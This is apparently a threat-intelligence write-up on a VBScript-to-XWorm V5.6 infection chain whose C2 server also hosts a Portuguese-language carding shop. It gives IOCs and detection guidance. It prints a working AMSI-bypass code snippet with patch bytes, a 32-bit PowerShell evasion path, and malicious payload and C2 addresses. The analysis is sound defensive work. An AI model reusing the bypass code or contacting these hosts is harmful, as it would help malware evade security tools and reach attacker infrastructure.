XWorm V5.6 Meets Carding Shop: Inside a Brazilian Operator's Vertically Integrated Cybercrime Pipeline
Published: 2026-03-14 Author: GHOST -- Breakglass Intelligence Tags: XWorm, RAT, carding, fraud, AMSI-bypass, .NET, process-injection, Brazil, vertical-integration Attribution: Reported via @abuse_ch MalwareBazaar
TL;DR
A VBScript dropper masquerading as a French real-estate document delivers XWorm V5.6 through a three-stage chain with Brazilian Portuguese anti-analysis padding and a reflective AMSI bypass. The interesting part is not the RAT -- it is what sits on the secondary C2 server. The same operator runs both the XWorm infrastructure on one DigitalOcean box and "Iluminat Store infosCC," a Portuguese-language carding marketplace, on a Contabo server in Germany. Both run identical Windows XAMPP stacks. The stolen credentials from XWorm victims likely feed directly into the Iluminat Store inventory. This is vertical integration of cybercrime: harvest credentials with the RAT, monetize them through the card shop, same operator, same infrastructure fingerprint.
The Lure: French Real Estate, Brazilian Code
The initial dropper is Projet20Immobilier.vbs -- a VBScript file using a French real-estate project filename as the social engineering lure. The target demographic is French-speaking victims, but the code tells a different story about who built it.
Buried in the 600+ lines of source are anti-analysis padding functions written in Brazilian Portuguese:
' Junk function padding — Portuguese variable names throughout
Function LixoCalc1(a, b)
' "lixo" = garbage in Portuguese
LixoCalc1 = a + b
End Function
Function LixoText1(t)
' "código real começa depois" = real code starts after
LixoText1 = t & " lixo"
End Function
These are not functional. LixoCalc1, LixoCalc2, LixoText1, LixoText2 -- dozens of them, all dead code. Their sole purpose is to inflate the script, break static analysis signatures, and push the actual payload past AV scanner byte-window limits. The developer comments -- "lixo" (garbage), "codigo real" (real code) -- confirm a native Brazilian Portuguese speaker.
The functional payload downloads a .NET loader from http://157.245.45.38/in.txt, but the URL is not stored in plaintext. The script uses a simple substitution cipher -- !! is replaced with A at runtime -- to obscure strings from static scanners. Not sophisticated, but effective against signature-based detection that looks for raw URLs.
The Kill Chain: VBS to InstallUtil.exe Injection
Stage 1: Projet20Immobilier.vbs (VBScript dropper)
| Downloads from 157.245.45.38/in.txt ("!!" → "A" deobfuscation)
| Forces 32-bit PowerShell via SysWOW64
|
Stage 2: ClassLibrary2.dll (.NET loader)
| Reflective AMSI bypass
| Downloads + decodes XWorm payload
|
Stage 3: XWorm V5.6
| Injected into InstallUtil.exe (LOLBin)
| C2: 157.245.45.38:7771
The SysWOW64 Trick
The VBS dropper does not invoke PowerShell directly. It explicitly calls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- the 32-bit version. This is a deliberate evasion technique. Most EDR products hook ntdll.dll and amsi.dll in 64-bit processes. By forcing execution into the WoW64 subsystem, the loader operates in a 32-bit address space where many 64-bit hooks do not reach. The AMSI bypass that follows becomes significantly more reliable in this context.
The AMSI Bypass: Reflective Memory Patching
ClassLibrary2.dll performs a textbook reflective AMSI bypass before loading the final payload:
// Simplified from decompiled .NET IL
IntPtr amsiDll = LoadLibrary("amsi.dll");
IntPtr scanBuffer = GetProcAddress(amsiDll, "AmsiScanBuffer");
// Make memory writable
VirtualProtect(scanBuffer, (UIntPtr)8, 0x40, out uint oldProtect); // PAGE_EXECUTE_READWRITE
// Patch AmsiScanBuffer to return AMSI_RESULT_CLEAN
byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; // mov eax, 0x80070057; ret
Marshal.Copy(patch, 0, scanBuffer, patch.Length);
// Restore original protection
VirtualProtect(scanBuffer, (UIntPtr)8, oldProtect, out _);
The patch overwrites the first 6 bytes of AmsiScanBuffer with mov eax, 0x80070057; ret -- returning E_INVALIDARG, which tells the caller "scan failed, proceed anyway." The VirtualProtect call grants RWX permissions, Marshal.Copy writes the patch, then permissions are restored to cover the tracks. This is a well-documented technique (first published circa 2018), but the RWX-then-restore pattern is a step above the lazy implementations that leave RWX permanently.
After AMSI is blinded, the loader downloads the XWorm payload, decodes it, and injects it into InstallUtil.exe -- a Microsoft-signed .NET utility that lives in the framework directory. Using InstallUtil as the injection target is a Living-off-the-Land Binary (LOLBin) technique: the process is legitimate, signed, and typically whitelisted by application control policies.
XWorm V5.6: Configuration and Capabilities
The XWorm config was decrypted from the injected payload:
| Field | Value |
|---|---|
| Version | XWorm V5.6 |
| C2 | 157.245.45.38:7771 |
| Mutex | 7VhafN70XMAdlUsS |
| KEY | <123456789> |
| Install | false (fileless) |
The KEY field is the critical OPSEC failure here. <123456789> is the default XWorm encryption key -- the value that ships in the builder when you first open it. Every XWorm operator is supposed to change this. Leaving it at default means any researcher who has used XWorm's builder can decrypt this operator's C2 traffic with zero effort. It also means the mutex-derived AES key for config encryption is predictable, making automated extraction trivial.
This sample was originally misclassified as AsyncRAT on MalwareBazaar. The V5.6 version string and the <Xwormmm>-style delimiter structure confirmed XWorm after manual analysis.
Command Set
XWorm V5.6 is a full-featured RAT. The decrypted command handler table includes:
| Category | Commands |
|---|---|
| Surveillance | screenshot, keylog_start, camera_capture, audio_record |
| Remote Access | shell_exec, file_upload, file_download, process_list, process_kill |
| Network | ddos_start, ddos_stop, hosts_file_edit |
| Persistence | usb_spread, startup_add, registry_persist |
| Destruction | ransomware_plugin, wipe_disk |
| Evasion | disable_defender, disable_uac, disable_firewall |
The hosts_file_edit command is particularly relevant to the carding angle -- it enables DNS hijacking on the victim's machine, which can redirect banking domains to phishing pages for real-time credential capture. The ransomware_plugin interface suggests the operator has access to encryption modules, though none were observed deployed.
Dual Infrastructure: The Real Story
This is where the investigation diverged from a routine XWorm analysis. The primary C2 at 157.245.45.38 was expected. The secondary server was not.
Primary C2: 157.245.45.38 (DigitalOcean)
| Service | Details |
|---|---|
| XWorm C2 | Port 7771 |
| Web Server | Apache/2.4 (XAMPP, Win64) |
| Open Directory | 11+ payload variants visible |
| Payload Hosting | /in.txt (ClassLibrary2.dll, obfuscated) |
The open directory on the primary C2 contained at least 11 payload variants -- different builds of the VBS dropper and .NET loader, suggesting active A/B testing of delivery mechanisms or targeting multiple campaigns simultaneously.
Secondary C2: 194.163.168.11 (Contabo, Germany)
| Service | Details |
|---|---|
| Carding Marketplace | "Iluminat Store infosCC" -- Portuguese-language |
| REST API Panel | Custom C2 management interface |
| PowerShell Beacon | /api/ endpoint (persistent callback) |
| XWorm Management | Secondary RAT control functions |
| Web Server | Apache/2.4 (XAMPP, Win64) |
The secondary server runs two things: a custom REST API panel with XWorm management capabilities, and Iluminat Store -- a Portuguese-language carding marketplace selling stolen credit card data and gift cards.
The Same Operator
Both servers run identical software stacks: Apache on Windows with XAMPP. The same operator fingerprint -- down to the XAMPP configuration artifacts and directory structure conventions -- appears on both boxes. The PowerShell beacon on the secondary C2's /api/ endpoint provides persistent access from compromised machines, creating a bridge between the RAT infrastructure and the fraud operation.
Vertical Integration: From RAT to Card Shop
Most malware investigations find one thing. A RAT campaign. A phishing kit. A carding shop. This investigation found the full pipeline on connected infrastructure operated by the same individual.
The business model:
- Harvest -- XWorm V5.6 deploys to victims via the French real-estate lure. Keylogger, clipboard monitor, and browser credential recovery capture financial data.
- Hosts file hijack -- DNS manipulation redirects banking sites to attacker-controlled pages for real-time card capture.
- Aggregate -- Stolen card data flows to the operator's infrastructure.
- Monetize -- Cards appear as inventory in Iluminat Store, sold to other criminals for cash-out.
The "Iluminat Store infosCC" name itself is a tell. "InfosCC" is Brazilian underground slang for "informacoes de cartao de credito" -- credit card information. The store sells stolen cards and gift cards to downstream buyers, creating a second revenue stream beyond whatever the RAT itself yields through direct access to victim machines.
This is not a sophisticated APT. This is a Brazilian cybercriminal who built a vertically integrated operation: steal the data yourself, sell it yourself, cut out the middleman. The default XWorm encryption key and the exposed open directories suggest a mid-skill operator who compensates for poor OPSEC with operational volume.
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| User Execution: Malicious File | T1204.002 | Projet20Immobilier.vbs real-estate lure |
| Command and Scripting: VBScript | T1059.005 | VBS dropper with Portuguese junk padding |
| Command and Scripting: PowerShell | T1059.001 | SysWOW64 32-bit PowerShell forced execution |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Reflective AMSI bypass via AmsiScanBuffer patch |
| Signed Binary Proxy Execution: InstallUtil | T1218.004 | XWorm injected into InstallUtil.exe |
| Obfuscated Files: Indicator Removal from Tools | T1027.005 | !! to A string substitution, 600+ junk lines |
| Ingress Tool Transfer | T1105 | HTTP download of ClassLibrary2.dll |
| Input Capture: Keylogging | T1056.001 | XWorm keylogger module |
| Clipboard Data | T1115 | XWorm clipboard capture |
| Screen Capture | T1113 | XWorm screenshot command |
| Video Capture | T1125 | XWorm camera capture |
| System Network Configuration Discovery | T1016 | Hosts file modification for DNS hijack |
| Replication Through Removable Media | T1091 | USB spread capability |
| Non-Standard Port | T1571 | C2 on port 7771 |
| Proxy: Multi-hop Proxy | T1090.003 | Dual C2 infrastructure across providers |
Indicators of Compromise
Network IOCs
| IOC | Type | Description |
|---|---|---|
157.245.45.38 | IP | Primary C2 -- XWorm listener port 7771, payload hosting (DigitalOcean) |
157.245.45.38:7771 | IP:Port | XWorm V5.6 C2 callback |
194.163.168.11 | IP | Secondary C2 -- Iluminat Store carding shop + REST API panel (Contabo DE) |
194.163.168.11/api/ | URL | PowerShell persistent beacon endpoint |
157.245.45.38/in.txt | URL | ClassLibrary2.dll payload (obfuscated) |
File IOCs
| Indicator | Type | Description |
|---|---|---|
Projet20Immobilier.vbs | Filename | VBScript dropper, French real-estate lure |
ClassLibrary2.dll | Filename | .NET loader with AMSI bypass |
LixoCalc1, LixoCalc2, LixoText1, LixoText2 | Function names | Portuguese junk padding functions |
XWorm Configuration
Version: XWorm V5.6
C2: 157.245.45.38:7771
Mutex: 7VhafN70XMAdlUsS
KEY: <123456789> (DEFAULT — unchanged from builder)
Delimiter: <Xwormmm>
Injection: InstallUtil.exe
Host Indicators
# AMSI bypass signature — AmsiScanBuffer patch bytes
B8 57 00 07 80 C3 (mov eax, 0x80070057; ret)
# 32-bit PowerShell execution from VBScript
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
# Mutex
7VhafN70XMAdlUsS
# URL deobfuscation pattern
String replacement: "!!" → "A" in download URLs
Detection Guidance
Network: Alert on outbound TCP to 157.245.45.38:7771 and any HTTP traffic to 194.163.168.11/api/. Monitor for <Xwormmm> delimiter in TCP streams -- XWorm's field separator is transmitted in cleartext when using the default key.
Endpoint: Flag InstallUtil.exe spawned by powershell.exe where the PowerShell parent was invoked from the SysWOW64 path (32-bit forced execution). Monitor for VirtualProtect calls targeting amsi.dll memory regions followed by Marshal.Copy -- the AMSI bypass signature. The specific patch bytes B8 57 00 07 80 C3 at the start of AmsiScanBuffer are a high-confidence indicator.
Threat hunting: Search for VBScript files containing Portuguese strings (lixo, codigo, resultado) combined with HTTP download functions. The combination of a Romance-language lure filename with Portuguese source comments is a distinctive operator fingerprint.
This investigation was conducted by GHOST for Breakglass Intelligence. The dual-infrastructure finding -- RAT C2 colocated with a carding marketplace -- represents a pattern worth tracking. Operators who control the full chain from initial access to monetization are harder to disrupt because there is no marketplace dependency, no affiliate relationship, no external party that can be pressured. The entire operation lives and dies with one person.
Breakglass Intelligence -- Automated OSINT by BGI